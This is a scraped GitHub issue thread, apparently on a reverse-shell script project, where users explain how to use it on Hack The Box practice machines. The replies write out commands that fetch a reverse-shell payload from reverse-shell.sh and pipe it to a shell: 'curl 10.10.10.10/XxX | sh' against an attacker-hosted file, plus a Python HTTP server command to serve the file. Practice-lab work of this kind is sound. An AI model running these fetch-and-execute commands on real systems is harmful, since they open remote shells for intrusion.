We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hello sir, can u help me, how can i use this in HACK THE BOX machines ?
The text was updated successfully, but these errors were encountered:
Same procedure, just put the tunnel vpn to your connection. like: $ifconfig tun0 curl https://reverse-shell.sh/ IPFROMTUN0 :port
hope helps!
cheers!
Sorry, something went wrong.
I think you asked the question, because those boxes doesn't have internet access... So, in this case...you have to keep a copy of that file
curl https://reverse-shell.sh/10.10.10.10:1337 > XxX
now you need to host that file on your attacker machine and request it from the victim machine... Like this-
root@kali:~# python3 -m http.server 80
target
curl 10.10.10.10/XxX | sh
I hope that make sense 👀
No branches or pull requests
Hello sir, can u help me, how can i use this in HACK THE BOX machines ?
The text was updated successfully, but these errors were encountered: